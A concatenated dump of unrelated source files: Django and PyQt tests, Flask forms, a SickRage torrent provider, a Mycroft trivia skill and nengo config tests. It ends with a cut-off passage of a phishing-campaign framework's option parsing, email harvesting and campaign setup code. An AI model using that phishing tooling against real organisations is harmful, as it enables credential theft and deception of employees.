pombredanne/rest-api-mock-server | mock_webapp/mock_api/tests/test_admin.py | 1 | 2713 | # -*- coding: utf-8 -*-
from django.conf import settings
from django.core.urlresolvers import reverse
from django.test import TestCase
from mock import patch, ANY
from mock_api.models import AccessLog
@patch("requests.request")
class AccessLogAdminTest(TestCase):
fixtures = ("test_api.json", "test_access_logs.json", "test_users.json")
API_ENDPOINT_URL = '/api/items/'
def setUp(self):
self.client.login(username="admin", password="pass")
def url(self, access_log_pk):
return reverse("admin:run_api_endpoint_callback", args=(access_log_pk,))
def get_first_callback(self, access_log):
return access_log.api_endpoint.callbacks.first()
def assert_message(self, message_mock, message):
message_mock.assert_called_once_with(ANY, ANY, message)
def test_run_api_endpoint_callback_for_missing_access_log_object_returns_404(self, request_mock):
response = self.client.get(self.url(9999))
self.assertEqual(response.status_code, 404)
self.assertEqual(request_mock.call_count, 0)
@patch("django.contrib.messages.add_message")
def test_run_api_endpoint_callback_with_one_callback_defined(self, message_mock, request_mock):
access_log = AccessLog.objects.get(pk=1)
callback = self.get_first_callback(access_log)
response = self.client.get(self.url(access_log.pk))
self.assertEqual(response.status_code, 302)
request_mock.assert_called_once_with(callback.method, callback.url, params=callback.get_params(),
headers=callback.get_headers(),
timeout=settings.DEFAULT_CALLBACK_REQUEST_TIMEOUT)
self.assert_message(message_mock, 'Api endpoint {} callbacks were run'.format(access_log.api_endpoint))
@patch("django.contrib.messages.add_message")
def test_run_api_endpoint_callback_without_callback_defined(self, message_mock, request_mock):
access_log = AccessLog.objects.get(pk=2)
response = self.client.get(self.url(access_log.pk))
self.assertEqual(response.status_code, 302)
self.assertEqual(request_mock.call_count, 0)
self.assert_message(message_mock, 'No callbacks for api endpoint {}'.format(access_log.api_endpoint))
@patch("django.contrib.messages.add_message")
def test_run_api_endpoint_callback_without_api_endpoint(self, message_mock, request_mock):
access_log = AccessLog.objects.get(pk=3)
response = self.client.get(self.url(access_log.pk))
self.assertEqual(response.status_code, 302)
self.assertEqual(request_mock.call_count, 0)
self.assertEqual(message_mock.call_count, 0)
| mit | -3,531,914,026,436,281,000 | 41.390625 | 111 | 0.683008 | false |
wbali/rwc-inventory-manager | inventory_manager_app/stock/forms.py | 1 | 1742 | from flask_wtf import FlaskForm
from wtforms import StringField, DateField, IntegerField, SelectField, DecimalField
from wtforms.validators import DataRequired, Optional
from wtforms.widgets import TextArea
class StockForm(FlaskForm):
stock_id = IntegerField()
item_name = StringField("Item name", validators=[
DataRequired(message="Please enter the item's name.")
])
arrival_date = DateField("Arrival date", validators=[Optional()])
price = DecimalField("Price", validators=[
DataRequired(message="Please enter the item's price.")
])
shipping_date = DateField("Shipping date", validators=[Optional()])
selling_price = DecimalField("Selling-price", validators=[Optional()])
quantity = IntegerField("Quantity", validators=[Optional()])
customer = SelectField(validators=[Optional()], coerce=int)
vendor = SelectField(validators=[Optional()], coerce=int)
billing_date = DateField("Billing date", validators=[Optional()])
notes = StringField("Notes", widget=TextArea())
barcode = StringField("Barcode", validators=[Optional()])
class VendorForm(FlaskForm):
vendor_id = IntegerField()
name = StringField("Vendor name", validators=[
DataRequired(message="Please enter the vendor's name.")
])
address = StringField("Address", validators=[
DataRequired(message="Please enter the vendor's address.")
])
class CustomerForm(FlaskForm):
customer_id = IntegerField()
name = StringField("Customer name", validators=[
DataRequired(message="Please enter the customer's name.")
])
address = StringField("Address", validators=[
DataRequired(message="Please enter the customer's address.")
]) | mit | -1,446,767,546,980,391,400 | 27.57377 | 83 | 0.695178 | false |
Arcanemagus/SickRage | sickbeard/providers/rarbg.py | 1 | 6962 | # coding=utf-8
# Author: Dustyn Gibson <[email protected]>
#
# URL: https://sick-rage.github.io
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import datetime
import time
import sickbeard
from sickbeard import logger, tvcache
from sickbeard.common import cpu_presets
from sickbeard.indexers.indexer_config import INDEXER_TVDB
from sickrage.helper.common import convert_size, try_int
from sickrage.providers.torrent.TorrentProvider import TorrentProvider
class RarbgProvider(TorrentProvider): # pylint: disable=too-many-instance-attributes
def __init__(self):
TorrentProvider.__init__(self, "Rarbg")
self.public = True
self.minseed = None
self.ranked = None
self.sorting = None
self.minleech = None
self.token = None
self.token_expires = None
# Spec: https://torrentapi.org/apidocs_v2.txt
self.url = "https://rarbg.com"
self.urls = {"api": "http://torrentapi.org/pubapi_v2.php"}
self.proper_strings = ["{{PROPER|REPACK}}"]
self.cache = tvcache.TVCache(self, min_time=10) # only poll RARBG every 10 minutes max
def login(self):
if self.token and self.token_expires and datetime.datetime.now() < self.token_expires:
return True
login_params = {
"get_token": "get_token",
"format": "json",
"app_id": "sickrage2"
}
response = self.get_url(self.urls["api"], params=login_params, returns="json")
if not response:
logger.log("Unable to connect to provider", logger.WARNING)
return False
self.token = response.get("token")
self.token_expires = datetime.datetime.now() + datetime.timedelta(minutes=14) if self.token else None
return self.token is not None
def search(self, search_strings, age=0, ep_obj=None): # pylint: disable=too-many-branches, too-many-locals, too-many-statements
results = []
if not self.login():
return results
search_params = {
"app_id": "sickrage2",
"category": "tv",
"min_seeders": try_int(self.minseed),
"min_leechers": try_int(self.minleech),
"limit": 100,
"format": "json_extended",
"ranked": try_int(self.ranked),
"token": self.token,
}
if ep_obj is not None:
ep_indexerid = ep_obj.show.indexerid
ep_indexer = ep_obj.show.indexer
else:
ep_indexerid = None
ep_indexer = None
for mode in search_strings:
items = []
logger.log("Search Mode: {0}".format(mode), logger.DEBUG)
if mode == "RSS":
search_params["sort"] = "last"
search_params["mode"] = "list"
search_params.pop("search_string", None)
search_params.pop("search_tvdb", None)
else:
search_params["sort"] = self.sorting if self.sorting else "seeders"
search_params["mode"] = "search"
if ep_indexer == INDEXER_TVDB and ep_indexerid:
search_params["search_tvdb"] = ep_indexerid
else:
search_params.pop("search_tvdb", None)
for search_string in search_strings[mode]:
if mode != "RSS":
search_params["search_string"] = search_string
logger.log("Search string: {0}".format
(search_string.decode("utf-8")), logger.DEBUG)
time.sleep(cpu_presets[sickbeard.CPU_PRESET])
data = self.get_url(self.urls["api"], params=search_params, returns="json")
if not isinstance(data, dict):
logger.log("No data returned from provider", logger.DEBUG)
continue
error = data.get("error")
error_code = data.get("error_code")
# Don't log when {"error":"No results found","error_code":20}
# List of errors: https://github.com/rarbg/torrentapi/issues/1#issuecomment-114763312
if error:
if try_int(error_code) != 20:
logger.log(error)
continue
torrent_results = data.get("torrent_results")
if not torrent_results:
logger.log("Data returned from provider does not contain any torrents", logger.DEBUG)
continue
for item in torrent_results:
try:
title = item.pop("title")
download_url = item.pop("download")
if not all([title, download_url]):
continue
seeders = item.pop("seeders")
leechers = item.pop("leechers")
if seeders < self.minseed or leechers < self.minleech:
if mode != "RSS":
logger.log("Discarding torrent because it doesn't meet the"
" minimum seeders or leechers: {0} (S:{1} L:{2})".format
(title, seeders, leechers), logger.DEBUG)
continue
torrent_size = item.pop("size", -1)
size = convert_size(torrent_size) or -1
torrent_hash = self.hash_from_magnet(download_url)
if mode != "RSS":
logger.log("Found result: {0} with {1} seeders and {2} leechers".format
(title, seeders, leechers), logger.DEBUG)
result = {'title': title, 'link': download_url, 'size': size, 'seeders': seeders, 'leechers': leechers, 'hash': torrent_hash}
items.append(result)
except StandardError:
continue
# For each search mode sort all the items by seeders
items.sort(key=lambda d: try_int(d.get('seeders', 0)), reverse=True)
results += items
return results
provider = RarbgProvider()
| gpl-3.0 | 7,859,844,668,399,947,000 | 38.333333 | 149 | 0.548118 | false |
JarbasAI/jarbas-core | mycroft/jarbas-skills/skill_trivia/__init__.py | 1 | 10505 | from adapt.intent import IntentBuilder
from mycroft.skills.core import MycroftSkill
import random, math, os, sys
from os.path import dirname
path= dirname(dirname(__file__))
sys.path.append(path)
# import intent layers
from service_intent_layer import IntentParser
__author__ = 'jarbas'
class MathQuestions:
def __init__(self):
self.questions = []
self.init_questions()
def ft(self, text, randints, randdec, randsgnint):
return text.format(randints, randdec, randsgnint)
def init_questions(self):
# TODO more questions / equation types
self.questions.append(["Convert {1[0]:0.2f} centimeters into meters.", "{1[0]}*0.01"])
self.questions.append([
"What is the length of the line segment with endpoints ({2[1]},{2[2]}) and ({2[3]},{2[4]})?",
"math.sqrt(({2[3]}-{2[1]})**2 + ({2[4]}-{2[2]})**2)"])
self.questions.append(["Solve for x in the equation {2[1]}x - {0[2]} = {2[7]}", "({2[7]}+{0[2]})*1./{2[1]}"])
def ask_question(self):
question = random.choice(self.questions)
answer = question[1]
question = question[0]
question, answer = self.answer_question(question, answer)
return question, answer
def answer_question(self, question, answer):
randints = []
randdec = []
randsgnint = []
for a in range(1,
11): # Creates three arrays of whole numbers, random decimals, and random signed integers for use in questions.
randints.append(random.randint(1, 10))
randdec.append(math.sqrt(random.randint(1, 100)) * random.randint(1, 10))
randsgnint.append(random.randint(-10, 10))
question = self.ft(question, randints, randdec,
randsgnint) # The function replaces all symbols in the question with the correct number types
answer = eval(self.ft(answer, randints, randdec,
randsgnint)) # This stores the numerical answer based on the string provided with the answer.
return question, answer
class TriviaQuestions:
def __init__(self):
self.questions = {} #"categorie" : [[question, answer], [question, answer]]
self.categories = ["general", "geography", "history", "literature", "movies", "music", "science", "sports"]
self.load_questions()
def load_questions(self):
for cat in self.categories:
questions = []
answers = []
path = os.path.dirname(__file__) + '/' + cat + ".txt"
with open(path) as f:
lines = f.readlines()
i = 1
for line in lines:
if i % 2 == 0:
answers.append(line)
else:
questions.append(line)
i += 1
self.questions[cat] = []
for i in range(len(questions)):
self.questions[cat].append([questions[i], answers[i]])
def ask_question(self, categorie="general"):
question = random.choice(self.questions[categorie])
answer = question[1]
question = question[0]
return question, answer
class TriviaSkill(MycroftSkill):
def __init__(self):
super(TriviaSkill, self).__init__(name="TriviaSkill")
# initialize your variables
self.quizz = False
self.continuous = False
self.math = MathQuestions()
self.trivia = TriviaQuestions()
self.answer = None
self.categorie = "all"
self.categories = ["math", "general", "geography", "history", "literature", "movies", "music", "science", "sports"]
def initialize(self):
self.intent_parser = IntentParser(self.emitter)
# register intents
self.build_intents()
def build_intents(self):
# build
trivia_intent = IntentBuilder("TriviaGameIntent") \
.require("triviastart").build()
cat_intent = IntentBuilder("TriviaCategorieIntent") \
.require("Categorie").build()
geography_intent = IntentBuilder("GeographyQuestionIntent") \
.require("geography").build()
history_intent = IntentBuilder("HistoryQuestionIntent") \
.require("history").build()
literature_intent = IntentBuilder("LiteratureQuestionIntent") \
.require("literature").build()
math_intent = IntentBuilder("MathQuestionIntent") \
.require("math").build()
movie_intent = IntentBuilder("MovieQuestionIntent") \
.require("movie").build()
music_intent = IntentBuilder("MusicQuestionIntent") \
.require("music").build()
science_intent = IntentBuilder("ScienceQuestionIntent") \
.require("science").build()
sports_intent = IntentBuilder("SportsQuestionIntent") \
.require("sports").build()
general_intent = IntentBuilder("QuestionIntent") \
.require("question").build()
stop_intent = IntentBuilder("StopTriviaIntent") \
.require("stoptrivia").build()
# register
self.register_intent(trivia_intent,
self.handle_trivia_game_start)
self.register_intent(geography_intent,
self.handle_geography_question)
self.register_intent(history_intent,
self.handle_history_question)
self.register_intent(literature_intent,
self.handle_literature_question)
self.register_intent(math_intent,
self.handle_math_question)
self.register_intent(movie_intent,
self.handle_movies_question)
self.register_intent(music_intent,
self.handle_music_question)
self.register_intent(science_intent,
self.handle_science_question)
self.register_intent(sports_intent,
self.handle_sports_question)
self.register_intent(general_intent,
self.handle_general_question)
self.register_intent(cat_intent,
self.handle_change_cat_intent)
self.register_intent(stop_intent,
self.handle_stop_quizz)
def random_question(self):
if self.categorie == "math":
self.quizz = True
question, self.answer = self.math.ask_question()
elif self.categorie == "all":
self.quizz = True
cat = random.choice(self.categories)
if cat == "math":
question, self.answer = self.math.ask_question()
else:
question, self.answer = self.trivia.ask_question(cat)
else:
self.quizz = True
question, self.answer = self.trivia.ask_question(self.categorie)
return question
def handle_trivia_game_start(self, message):
if self.categorie == "all":
self.categorie = random.choice(self.categories)
self.speak_dialog("trivia", {"cat": self.categorie, "question":self.random_question()})
self.continuous = True
def handle_change_cat_intent(self, message):
cat = message.data["Categorie"].replace(" ","").replace('"',"")
if cat in self.categories:
self.categorie = cat
self.speak_dialog("categorie", {"cat": self.categorie})
else:
self.speak(cat + " is an invalid categorie")
def handle_math_question(self, message):
self.quizz = True
question, self.answer = self.math.ask_question()
self.speak(question, expect_response=True)
def handle_sports_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("sports")
self.speak(question, expect_response=True)
def handle_movies_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("movies")
self.speak(question, expect_response=True)
def handle_music_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("music")
self.speak(question, expect_response=True)
def handle_literature_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("literature")
self.speak(question, expect_response=True)
def handle_history_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("history")
self.speak(question, expect_response=True)
def handle_geography_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("geography")
self.speak(question, expect_response=True)
def handle_science_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question("science")
self.speak(question, expect_response=True)
def handle_general_question(self, message):
self.quizz = True
question, self.answer = self.trivia.ask_question()
self.speak(question, expect_response=True)
def handle_stop_quizz(self, message):
self.stop()
def stop(self):
if self.quizz or self.continuous:
self.speak("Exiting Quizz mode")
self.quizz = False
self.continuous = False
self.answer = None
self.categorie = "all"
def converse(self, transcript, lang="en-us"):
# check if some of the intents will be handled
intent, id = self.intent_parser.determine_intent(transcript[0])
if id == self.skill_id:
# intent from this skill will be triggered
# only stop, change categorie, specific questions intents available
pass
elif self.continuous and self.answer is not None:
self.speak_dialog("trivianext", {"ans" : str(self.answer), "question":self.random_question()}, expect_response=True)
return True
elif self.quizz and self.answer is not None:
self.speak("the correct answer is " + str(self.answer), expect_response=True)
self.quizz = False
self.answer = None
return True
return False
def create_skill():
return TriviaSkill() | gpl-3.0 | -7,013,586,128,043,303,000 | 38.645283 | 135 | 0.58991 | false |
asselapathirana/RRPam-WDS | src/rrpam_wds/tests/test_logging.py | 1 | 2109 | from rrpam_wds.gui import set_pyqt_api # isort:skip # NOQA
import sys
import time
from PyQt5.QtWidgets import QApplication
from rrpam_wds.gui.dialogs import LogDialog
from rrpam_wds.gui.dialogs import MainWindow
from rrpam_wds.tests.test_utils import Test_Parent
from rrpam_wds.tests.test_utils import main
class TC(Test_Parent):
def setUp(self): # special setup for this test set.
global start
self.app = QApplication.instance() or QApplication(sys.argv)
start = time.time()
def test_creating_main_window_will_write_log_messages(self):
self.aw = MainWindow()
log = self.aw.logdialog.get_text()
self.assertIn(self.aw.LOGSTARTMESSAGE, log)
self.aw.show_logwindow()
def test_calling_show_log_in_main_window_will_show_log_dialog(self):
self.aw = MainWindow()
self.assertFalse([x for x in self.aw.mdi.subWindowList()
if isinstance(x.widget(), LogDialog)])
self.aw.show_logwindow()
li = [x for x in self.aw.mdi.subWindowList() if isinstance(x.widget(), LogDialog)]
self.assertTrue(li)
self.assertEqual(li[0].widget(), self.aw.logdialog)
def test_calling_show_log_multiple_times_will_not_create_multiple_windows(self):
self.aw = MainWindow()
self.aw.show_logwindow()
li1 = self.aw.mdi.subWindowList()
self.aw.show_logwindow()
li2 = self.aw.mdi.subWindowList()
self.assertEqual(li1, li2)
def closing_log_window_can_be_followed_by_opening_it_again_and_same_log_window_will_reaapper(
self):
self.aw = MainWindow()
self.aw.show_logwindow()
li1 = self.aw.mdi.subWindowList()
logdialog1 = [x for x in li1 if isinstance(x.widget(), LogDialog)][0]
logdialog1.close()
self.aw.show_logwindow()
li2 = self.aw.mdi.subWindowList()
logdialog2 = [x for x in li2 if isinstance(x.widget(), LogDialog)][0]
self.assertEqual(logdialog1.widget(), logdialog2.widget())
if __name__ == '__main__': # pragma: no cover
main(TC, test=False)
| gpl-3.0 | -5,391,814,945,688,619,000 | 35.362069 | 97 | 0.650545 | false |
ZeitgeberH/nengo | nengo/tests/test_config.py | 1 | 3332 | import pytest
import nengo
import nengo.config
def test_config():
@nengo.config.configures(nengo.Ensemble)
class TestConfigEnsemble(nengo.config.ConfigItem):
something = nengo.config.Parameter(None)
other = nengo.config.Parameter(0)
@nengo.config.configures(nengo.Connection)
class TestConfigConnection(nengo.config.ConfigItem):
something_else = nengo.config.Parameter(None)
class TestConfig(nengo.config.Config):
config_items = [TestConfigEnsemble, TestConfigConnection]
model = nengo.Network()
with model:
a = nengo.Ensemble(nengo.LIF(50), 1)
b = nengo.Ensemble(nengo.LIF(90), 1)
a2b = nengo.Connection(a, b, synapse=0.01)
config = TestConfig()
assert config[a].something is None
assert config[b].something is None
assert config[a].other == 0
assert config[b].other == 0
assert config[a2b].something_else is None
config[a].something = 'hello'
assert config[a].something == 'hello'
config[a].something = 'world'
assert config[a].something == 'world'
with pytest.raises(AttributeError):
config[a].something_else
config[a2b].something
with pytest.raises(AttributeError):
config[a].something_else = 1
config[a2b].something = 1
with pytest.raises(KeyError):
config['a'].something
with pytest.raises(KeyError):
config[None].something
with pytest.raises(KeyError):
config[model].something
def test_parameter_checking():
class PositiveParameter(nengo.config.Parameter):
def __set__(self, instance, value):
if not isinstance(value, (int, float)) or value <= 0:
raise AttributeError('value must be positive')
super(PositiveParameter, self).__set__(instance, value)
@nengo.config.configures(nengo.Ensemble)
class TestConfigEnsemble(nengo.config.ConfigItem):
number = PositiveParameter(1)
model = nengo.Network()
with model:
a = nengo.Ensemble(50, 1)
b = nengo.Ensemble(90, 1)
class TestConfig(nengo.config.Config):
config_items = [TestConfigEnsemble]
config = TestConfig()
config[a].number = 3
with pytest.raises(AttributeError):
config[a].number = 0
with pytest.raises(AttributeError):
config[b].number = 'a'
def test_invalid_config():
@nengo.config.configures(nengo.Ensemble)
class TestConfigEnsemble(nengo.config.ConfigItem):
number = nengo.config.Parameter(1)
class TestBadConfigConnection(nengo.config.ConfigItem):
number = nengo.config.Parameter(1)
with pytest.raises(AttributeError):
class TestConfig(nengo.config.Config):
pass
TestConfig()
with pytest.raises(AttributeError):
class TestConfig(nengo.config.Config):
config_items = [1, 2, 3]
TestConfig()
with pytest.raises(AttributeError):
class TestConfig(nengo.config.Config):
config_items = [TestBadConfigConnection]
TestConfig()
with pytest.raises(AttributeError):
class TestConfig(nengo.config.Config):
config_items = [TestConfigEnsemble, TestBadConfigConnection]
TestConfig()
if __name__ == '__main__':
nengo.log(debug=True)
pytest.main([__file__, '-v'])
| gpl-3.0 | 283,863,634,523,770,460 | 29.568807 | 72 | 0.654862 | false |
firebitsbr/SPF | spf/core/framework.py | 1 | 48936 | #import getopt
import argparse
import emails
import sys
import re
import os
import subprocess
import time
import signal
from collections import defaultdict
#import our libs
from emails import EmailTemplate
from utils import Utils
from display import Display
from gather import Gather
from mydns import Dns
from webprofiler import profiler
from mydb import MyDB
from sitecloner import SiteCloner
from mailpillager import MailPillager
import portscan
#import our modules
from modules.theharvester import theHarvester
#=================================================
# Primary CLASS
#=================================================
class Framework(object):
def __init__(self):
self.config = {} # dict to contain combined list of config file options and commandline parameters
self.email_list = [] # list of email targets
self.hostname_list = [] # list of dns hosts
self.server_list = {}
self.profile_valid_web_templates = []
self.profile_dynamic_web_templates = []
self.pillaged_users = []
self.bestMailServerPort = None
self.bestMailServer = None
self.webserver = None # web server process
self.webserverpid = None
self.gather = None
self.mp = None # mail pillager
# initialize some config options
self.config["domain_name"] = ""
self.config["phishing_domain"] = ""
self.config["company_name"] = ""
self.config["config_filename"] = ""
self.config["email_list_filename"] = ""
# default all bool values to False
self.config["verbose"] = False
self.config["gather_emails"] = False
self.config["gather_dns"] = False
self.config["enable_externals"] = False
self.config["enable_web"] = False
self.config["enable_email"] = False
self.config["enable_email_sending"] = False
self.config["simulate_email_sending"] = False
self.config["daemon_web"] = False
self.config["always_yes"] = False
self.config["enable_advanced"] = False
self.config["profile_domain"] = False
self.config["pillage_email"] = False
# get current IP
#self.config['ip'] = None
# set a few misc values
self.pid_path = os.path.dirname(os.path.realpath(__file__)) + "/../"
self.display = Display()
self.email_templates = defaultdict(list)
#==================================================
# SUPPORT METHODS
#==================================================
#----------------------------
# CTRL-C display and exit
#----------------------------
def ctrlc(self):
print
self.display.alert("Ctrl-C caught!!!")
self.cleanup()
#----------------------------
# Close everything down nicely
#----------------------------
def cleanup(self):
print
if (self.webserver is not None):
if (self.config["daemon_web"]):
self.display.alert("Webserver is still running as requested.")
else:
# send SIGTERM to the web process
self.display.output("stopping the webserver")
self.webserver.send_signal(signal.SIGINT)
# delete the pid file
os.remove(self.pid_path + "spfwebsrv.pid")
# as a double check, manually kill the process
self.killProcess(self.webserverpid)
# call report generation
self.generateReport()
# exit
sys.exit(0)
#----------------------------
# Kill specified process
#----------------------------
def killProcess(self, pid):
if (os.path.exists("/proc/" + str(pid))):
self.display.alert("Killing process [%s]" % (pid))
os.kill(pid, signal.SIGKILL)
if (os.path.isfile(self.pid_path + "spfwebsrv.pid")):
os.remove(self.pid_path + "spfwebsrv.pid")
#----------------------------
# Generate The simple report
#----------------------------
def generateReport(self):
self.display.output("Generating phishing report")
self.display.log("ENDTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
# Start process
cmd = [os.getcwd() + "/report.py", self.outdir]
self.display.output("Report file located at %s%s" % (self.outdir + "reports/", subprocess.check_output(cmd)))
#----------------------------
# Parse CommandLine Parms
#----------------------------
def parse_parameters(self, argv):
parser = argparse.ArgumentParser()
#==================================================
# Input Files
#==================================================
filesgroup = parser.add_argument_group('input files')
filesgroup.add_argument("-f",
metavar="<list.txt>",
dest="email_list_file",
action='store',
help="file containing list of email addresses")
filesgroup.add_argument("-C",
metavar="<config.txt>",
dest="config_file",
action='store',
help="config file")
#==================================================
# Enable Flags
#==================================================
enablegroup = parser.add_argument_group('enable flags')
enablegroup.add_argument("--all",
dest="enable_all",
action='store_true',
help="enable ALL flags... same as (-g --external -s -w -v -v -y)")
enablegroup.add_argument("--test",
dest="enable_test",
action='store_true',
help="enable all flags EXCEPT sending of emails... same as (-g --external --simulate -w -y -v -v)")
enablegroup.add_argument("--recon",
dest="enable_recon",
action='store_true',
help="gather info (i.e. email addresses, dns hosts, websites, etc...) same as (-e --dns)")
enablegroup.add_argument("--external",
dest="enable_external",
action='store_true',
help="enable external tool utilization")
enablegroup.add_argument("--dns",
dest="enable_gather_dns",
action='store_true',
help="enable automated gathering of dns hosts")
enablegroup.add_argument("-g",
dest="enable_gather_email",
action='store_true',
help="enable automated gathering of email targets")
enablegroup.add_argument("-s",
dest="enable_send_email",
action='store_true',
help="enable automated sending of phishing emails to targets")
enablegroup.add_argument("--simulate",
dest="simulate_send_email",
action='store_true',
help="simulate the sending of phishing emails to targets")
enablegroup.add_argument("-w",
dest="enable_web",
action='store_true',
help="enable generation of phishing web sites")
enablegroup.add_argument("-W",
dest="daemon_web",
action='store_true',
help="leave web server running after termination of spf.py")
#==================================================
# Advanced Flags
#==================================================
advgroup = parser.add_argument_group('ADVANCED')
advgroup.add_argument("--adv",
dest="enable_advanced",
action='store_true',
help="perform all ADVANCED features same as (--dns --profile --pillage)")
advgroup.add_argument("--profile",
dest="profile_domain",
action='store_true',
help="profile the target domain (requires the --dns flag)")
advgroup.add_argument("--pillage",
dest="pillage_email",
action='store_true',
help="auto pillage email accounts (requires the --dns flag)")
#==================================================
# Optional Args
#==================================================
parser.add_argument("-d",
metavar="<domain>",
dest="domain",
action='store',
help="domain name to phish")
parser.add_argument("-p",
metavar="<domain>",
dest="phishdomain",
default="example.com",
action='store',
help="newly registered 'phish' domain name")
parser.add_argument("-c",
metavar="<company's name>",
dest="company",
action='store',
help="name of company to phish")
parser.add_argument("--ip",
metavar="<IP address>",
dest="ip",
#default=Utils.getIP(),
action='store',
help="IP of webserver defaults to [%s]" % (Utils.getIP()))
parser.add_argument("-v", "--verbosity",
dest="verbose",
action='count',
help="increase output verbosity")
#==================================================
# Misc Flags
#==================================================
miscgroup = parser.add_argument_group('misc')
miscgroup.add_argument("-y",
dest="always_yes",
action='store_true',
help="automatically answer yes to all questions")
# parse args
args = parser.parse_args()
# convert parameters to values in the config dict
self.config["domain_name"] = args.domain
if (self.config["domain_name"] is None):
self.config["domain_name"] = ""
self.config["phishing_domain"] = args.phishdomain
if (self.config["phishing_domain"] is None):
self.config["phishing_domain"] = "example.com"
self.config["company_name"] = args.company
if (args.ip):
self.config["ip"] = args.ip
self.config["config_filename"] = args.config_file
self.config["email_list_filename"] = args.email_list_file
self.config["verbose"] = args.verbose
self.config["gather_emails"] = args.enable_gather_email
self.config["gather_dns"] = args.enable_gather_dns
self.config["profile_domain"] = args.profile_domain
self.config["pillage_email"] = args.pillage_email
self.config["enable_externals"] = args.enable_external
self.config["enable_web"] = args.enable_web
self.config["enable_email_sending"] = args.enable_send_email
self.config["simulate_email_sending"] = args.simulate_send_email
self.config["daemon_web"] = args.daemon_web
self.config["always_yes"] = args.always_yes
# process meta flags
# recon = gather emails and gather dns
if (args.enable_recon == True):
self.config["gather_emails"] = True
self.config["gather_dns"] = True
# all = gather emails, enable externals, etc...
if (args.enable_all == True):
self.config["gather_emails"] = True
self.config["enable_externals"] = True
self.config["enable_web"] = True
self.config["enable_email_sending"] = True
self.config["verbose"] = 2
self.config["always_yes"] = True
# test = gather emails, enable externals, etc...
if (args.enable_test == True):
self.config["gather_emails"] = True
self.config["enable_externals"] = True
self.config["simulate_email_sending"] = True
self.config["enable_web"] = True
self.config["always_yes"] = True
self.config["verbose"] = 2
# advanced = dns, profile, and pillage
if (args.enable_advanced == True):
self.config["gather_dns"] = True
self.config["profile_domain"] = True
self.config["pillage_email"] = True
# profile requires dns
if (self.config["profile_domain"] and not self.config["gather_dns"]):
self.config["profile_domain"] = False
self.display.error("--profile requires the --dns option to be enabled as well.")
# pillage requires dns
if (self.config["pillage_email"] and not self.config["gather_dns"]):
self.config["pillage_email"] = False
self.display.error("--pillage requires the --dns option to be enabled as well.")
# see if we are good to go
good = False
if (self.config["email_list_filename"]
or self.config["gather_emails"]
or self.config["enable_externals"]
or self.config["enable_web"]
or self.config["enable_email_sending"]
or self.config["simulate_email_sending"]
or self.config["gather_dns"]
or self.config["profile_domain"]
or self.config["pillage_email"]):
good = True
if (not good):
self.display.error("Please enable at least one of the following parameters: -g --external --dns -s --simulate -w ( --all --test --recon --adv )")
print
parser.print_help()
sys.exit(1)
#----------------------------
# Process/Load config file
#----------------------------
def load_config(self):
# does config file exist?
if (self.config["config_filename"] is not None):
temp1 = self.config
temp2 = Utils.load_config(self.config["config_filename"])
self.config = dict(temp2.items() + temp1.items())
else:
# guess not.. so try to load the default one
if Utils.is_readable("default.cfg"):
self.display.error("a CONFIG FILE was not specified... defaulting to [default.cfg]")
print
temp1 = self.config
temp2 = Utils.load_config("default.cfg")
self.config = dict(temp2.items() + temp1.items())
else:
# someone must have removed it!
self.display.error("a CONFIG FILE was not specified...")
print
sys.exit(1)
# set verbosity/debug level
if (self.config['verbose'] >= 1):
self.display.enableVerbose()
if (self.config['verbose'] > 1):
self.display.enableDebug()
if (self.config["ip"] == "0.0.0.0") or (self.config["ip"] == None):
self.config["ip"]=Utils.getIP()
# set logging path
self.outdir = os.getcwd() + "/" + self.config["domain_name"] + "_" + self.config["phishing_domain"] + "/"
if not os.path.exists(os.path.dirname(self.outdir)):
os.makedirs(os.path.dirname(self.outdir))
self.display.setLogPath(self.outdir + "logs/")
# create sqllite db
self.db = MyDB(sqlite_file=self.outdir)
# log it
self.display.log("STARTTIME=%s\n" % (time.strftime("%Y/%m/%d %H:%M:%S")), filename="INFO.txt")
self.display.log("TARGETDOMAIN=%s\n" % (self.config["domain_name"]), filename="INFO.txt")
self.display.log("PHISHINGDOMAIN=%s\n" % (self.config["phishing_domain"]), filename="INFO.txt")
#----------------------------
# Load/Gather target email addresses
#----------------------------
def prep_email(self):
# are required flags set?
if ((self.config["email_list_filename"] is not None) or (self.config["gather_emails"] == True)):
print
self.display.output("Obtaining list of email targets")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# if an external email list file was specified, read it in
if self.config["email_list_filename"] is not None:
file = open(self.config["email_list_filename"], 'r')
temp_list = file.read().splitlines()
self.display.verbose("Loaded [%s] email addresses from [%s]" % (len(temp_list), self.config["email_list_filename"]))
self.email_list += temp_list
# gather email addresses
if self.config["gather_emails"] == True:
if (self.config["domain_name"] == ""):
self.display.error("No target domain specified. Can not gather email addresses.")
else:
self.display.verbose("Gathering emails via built-in methods")
self.display.verbose(Gather.get_sources())
if (not self.gather):
self.gather = Gather(self.config["domain_name"], display=self.display)
temp_list = self.gather.emails()
self.display.verbose("Gathered [%s] email addresses from the Internet" % (len(temp_list)))
self.email_list += temp_list
print
# gather email addresses from external sources
if (self.config["gather_emails"] == True) and (self.config["enable_externals"] == True):
# theHarvester
self.display.verbose("Gathering emails via theHarvester")
thr = theHarvester(self.config["domain_name"], self.config["theharvester_path"], display=self.display)
out = thr.run()
if (not out):
temp_list = thr.emails()
self.display.verbose("Gathered [%s] email addresses from theHarvester" % (len(temp_list)))
self.email_list += temp_list
else:
self.display.error(out)
print
# # Recon-NG
# self.display.verbose("Gathering emails via Recon-NG")
# temp_list = reconng(self.config["domain_name"], self.config["reconng_path"]).gather()
